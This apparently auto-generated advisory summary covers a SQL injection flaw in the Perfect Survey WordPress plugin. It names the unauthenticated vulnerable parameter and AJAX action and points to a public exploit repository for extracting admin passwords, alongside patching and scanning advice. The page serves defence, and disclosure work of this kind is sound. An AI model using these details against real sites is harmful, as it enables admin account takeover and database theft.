This is a summary of the AI-generated 10-question deep analysis. The full version (longer answers, follow-up Q&A, related CVEs) requires login. Read the full analysis β
Q1What is this vulnerability? (Essence + Consequences)
π¨ **Essence**: A SQL Injection (SQLi) flaw in the **Perfect Survey** WordPress plugin. π **Consequences**: Attackers can execute illegal SQL commands, potentially stealing data or taking over the admin account.β¦
π‘οΈ **Root Cause**: **CWE-89** (SQL Injection). The plugin fails to validate or escape the `question_id` GET parameter before using it in a SQL statement within the `get_question` AJAX action.β¦
π― **Affected**: **Perfect Survey WordPress plugin** versions **before 1.5.2**. π¦ If you are running an older version, you are in the danger zone. WordPress itself is the platform, but the plugin is the weak link.
Q4What can hackers do? (Privileges/Data)
π **Attacker Capabilities**: Unauthenticated users can perform SQL injection. π΅οΈββοΈ Specifically, exploits can **grep the admin password** (Blind SQLi). This means full account takeover and potential database compromise.
Q5Is exploitation threshold high? (Auth/Config)
π **Exploitation Threshold**: **LOW**. No authentication is required! πΆββοΈ Any unauthenticated user on the internet can trigger the vulnerability via the `question_id` parameter. Itβs an open door.
Q6Is there a public Exp? (PoC/Wild Exploitation)
π£ **Public Exploits**: **YES**. π Multiple PoCs exist, including a specific Blind SQLi exploit repo (`c4cnm/Exploit_CVE-2021-24762`) designed to extract admin passwords. Tools like Nuclei templates are also available.
Q7How to self-check? (Features/Scanning)
π **Self-Check**: Scan for the **Perfect Survey** plugin version. π οΈ Use scanners like **Nuclei** with the specific CVE template. Look for the `get_question` AJAX endpoint accepting unsanitized `question_id` parameters.
π§ **No Patch?**: If you can't update, **disable the plugin** immediately. π Alternatively, implement strict WAF rules to block SQL injection patterns in the `question_id` parameter, though disabling is safer.
Q10Is it urgent? (Priority Suggestion)
β‘ **Urgency**: **HIGH**. π¨ Since it allows **unauthenticated** access and leads to **admin password theft**, this is a critical threat. Patch now or risk total site compromise. Don't wait!